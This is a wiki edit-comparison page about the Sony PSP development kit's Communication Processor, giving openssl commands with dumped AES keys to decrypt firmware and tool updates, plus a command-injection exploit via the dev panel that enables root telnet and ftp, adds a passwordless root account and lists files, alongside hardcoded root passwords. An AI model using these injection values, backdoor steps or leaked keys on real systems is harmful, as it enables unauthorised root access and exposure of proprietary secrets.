Editing Communication Processor
Jump to navigation
Jump to search
The edit can be undone. Please check the comparison below to verify that this is what you want to do, and then publish the changes below to finish undoing the edit.
Latest revision | Your text | ||
Line 27: | Line 27: | ||
So use this Syntax after skipping the first 32 bytes of the file: | So use this Syntax after skipping the first 32 bytes of the file: | ||
{{keyboard|content= | {{keyboard|content=openssl aes-256-cbc -in reftool_cp_xxx.bin -K E8ED2B817207B70C5DF9090507AF2A8982967620D692B92A59231638402DF13F -iv the_first_16_bytes_of_the_file -d > dec.tgz | ||
}} | |||
PSP Hardware Tool Updates use the very same encryption but a different key inside the toolupdatedec binary. | PSP Hardware Tool Updates use the very same encryption but a different key inside the toolupdatedec binary. | ||
Line 34: | Line 34: | ||
The key to these units has also been dumped, here is the syntax to decrypt psp Hardware Tool Update for DTP-T1000 | The key to these units has also been dumped, here is the syntax to decrypt psp Hardware Tool Update for DTP-T1000 | ||
{{keyboard|content= | {{keyboard|content=openssl aes-256-cbc -in psptoolupdate.bin -K A400C48628A7A5294D11AE3BB2587AEA32E501C63E49D1DCAA19B5AEB092F3DB -iv the_first_16_bytes_of_the_file -d > dec.tgz | ||
}} | |||
P.S. If you have any trouble extracting the tarballs, try using Linux. | P.S. If you have any trouble extracting the tarballs, try using Linux. | ||
Line 281: | Line 281: | ||
Add a line to start telnet in inetd.conf (on DECR-1000 the line already exists in the original file but is commented; on DTP-T1000 telnet is enabled by default so this command is not required.) | Add a line to start telnet in inetd.conf (on DECR-1000 the line already exists in the original file but is commented; on DTP-T1000 telnet is enabled by default so this command is not required.) | ||
{{keyboard|content= | {{keyboard|content=; echo >>/etc/inetd.conf telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd }} | ||
Add a line to start ftpd in inetd.conf | Add a line to start ftpd in inetd.conf | ||
{{keyboard|content= | {{keyboard|content=; echo >>/etc/inetd.conf ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd }} | ||
Restart inetd to apply the above changes | Restart inetd to apply the above changes | ||
{{keyboard|content= | {{keyboard|content=; /etc/init.d/inetd restart }} | ||
Add an account called rt with root privileges and no password to the passwd file (alternatively on the DECR-1000 Communication Processor you may ignore this step and log in with the root account and the password cytology on the DTP-T1000 the password to the root account is tAchyOn ) | Add an account called rt with root privileges and no password to the passwd file (alternatively on the DECR-1000 Communication Processor you may ignore this step and log in with the root account and the password cytology on the DTP-T1000 the password to the root account is tAchyOn ) | ||
{{keyboard|content= | {{keyboard|content=; echo >>/etc/passwd rt::0:0:root:/root:/bin/bash }} | ||
You may also output files given the right path (if you don't want to mess with ftp) the below example creates a ls.txt file containing a listing of all files on the CP at the Development panel's root | You may also output files given the right path (if you don't want to mess with ftp) the below example creates a ls.txt file containing a listing of all files on the CP at the Development panel's root | ||
{{keyboard|content= | {{keyboard|content=; ls -alR /* > /usr/local/sony/www/html/ls.txt }} | ||
While sending all these commands (by clicking on the "Setting" button), the Development Tool's panel will send you an error message, this is normal (given the nature of the exploit) and can be ignored, just follow with the next commands until you have achieved your expected goal. | While sending all these commands (by clicking on the "Setting" button), the Development Tool's panel will send you an error message, this is normal (given the nature of the exploit) and can be ignored, just follow with the next commands until you have achieved your expected goal. |